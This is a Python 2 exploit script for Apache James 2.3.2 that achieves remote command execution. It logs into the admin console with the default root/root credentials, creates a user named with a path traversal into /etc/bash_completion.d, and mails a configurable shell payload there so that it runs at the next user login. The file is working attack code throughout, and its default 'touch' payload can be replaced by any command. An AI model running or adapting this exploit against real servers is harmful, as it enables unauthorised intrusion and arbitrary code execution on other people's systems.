exploit.py

1. """An exploit for Apache James 2.3.2 that executes remote commands.
2.  
3. This script works on Apache James deployments that use the default
4. configuration. It enqueues a payload to be executed the next time a user logs
5. in to the machine.
6.  
7. The default payload is "touch /tmp/proof.txt." However, if the server runs as
8. root, then the following command may be used:
9.  
10.    [ "$(id -u)" == "0" ] && touch /root/proof.txt
11.  
12. For more details, see: https://www.exploit-db.com/exploits/35513/.
13. """
14.  
15. import gflags
16. import socket
17. import sys
18. import time
19.  
20. FLAGS = gflags.FLAGS
21.  
22. gflags.DEFINE_string(
23.     'payload', 'touch /tmp/proof.txt', 'The payload to execute.')
24. gflags.DEFINE_string(
25.     'host', '127.0.0.1', 'The host address of the Apache James deployment.')
26. gflags.DEFINE_integer(
27.     'admin_port', '4555', 'The port number of the administration tool.')
28. gflags.DEFINE_integer('smtp_port', '25', 'The port number of the SMTP server.')
29.  
30. # Default administrator credentials
31. ADMIN_USER = 'root'
32. ADMIN_PASSWORD = 'root'
33.  
34. # The number of bytes to receive from the admin and SMTP servers.
35. RECV_BYTES = 1024
36.  
37. # The number of seconds to sleep after receiving data from the SMTP server.
38. SLEEP_SEC = 0.2
39.  
40.  
41. def ConnectToAdminServer():
42.     """Connects to the administration server.
43.  
44.    Returns:
45.      An open socket to the administration server.
46.  
47.    """
48.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49.     s.connect((FLAGS.host, FLAGS.admin_port))
50.     s.recv(RECV_BYTES)
51.     s.send(ADMIN_USER + '\n')
52.     s.recv(RECV_BYTES)
53.     s.send(ADMIN_PASSWORD + '\n')
54.     s.recv(RECV_BYTES)
55.     return s
56.  
57.  
58. def ConnectToSmtpServer():
59.     """Connects to the SMTP server.
60.  
61.    Returns:
62.      An open socket to the SMTP server.
63.  
64.    """
65.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
66.     s.connect((FLAGS.host, FLAGS.smtp_port))
67.     s.send('ehlo team@team.pl\r\n')
68.     RecvAndSleep(s)
69.     return s
70.  
71.  
72. def CreateNewSmtpUser(s):
73.     """Creates a new SMTP user.
74.  
75.    Args:
76.      s: An open socket to the administration tool.
77.  
78.    """
79.     s.send('adduser ../../../../../../../../etc/bash_completion.d exploit\n')
80.     s.recv(RECV_BYTES)
81.     s.send('quit\n')
82.     s.close()
83.  
84.  
85. def RecvAndSleep(s):
86.     """Receives data from a socket and sleeps.
87.  
88.    Args:
89.      s: An open socket.
90.  
91.    """
92.     s.recv(RECV_BYTES)
93.     time.sleep(SLEEP_SEC)
94.  
95.  
96. def SendSmtpPayload(s):
97.     """Sends the payload to the SMTP server.
98.  
99.    Args:
100.      s: An open socket to the SMTP server.
101.  
102.    """
103.     s.send('mail from: <\'@team.pl>\r\n')
104.     RecvAndSleep(s)
105.     # Also try: ../../../../../../../../etc/bash_completion.d@hostname>\r\n
106.     s.send('rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n')
107.     RecvAndSleep(s)
108.     s.send('data\r\n')
109.     RecvAndSleep(s)
110.     s.send('From: team@team.pl\r\n')
111.     s.send('\r\n')
112.     s.send('\'\n')
113.     s.send(FLAGS.payload + '\n')
114.     s.send('\r\n.\r\n')
115.     RecvAndSleep(s)
116.     s.send('quit\r\n')
117.     RecvAndSleep(s)
118.     s.close()
119.  
120.  
121. def Main(argv):
122.   try:
123.     argv = FLAGS(argv)
124.   except gflags.FlagsError, e:
125.     print '%s\nUsage: %s ARGS\n%s' % (e, sys.argv[0], FLAGS)
126.     sys.exit(-1)
127.  
128.   CreateNewSmtpUser(ConnectToAdminServer())
129.   SendSmtpPayload(ConnectToSmtpServer())
130.  
131.  
132. if __name__ == '__main__':
133.   Main(sys.argv)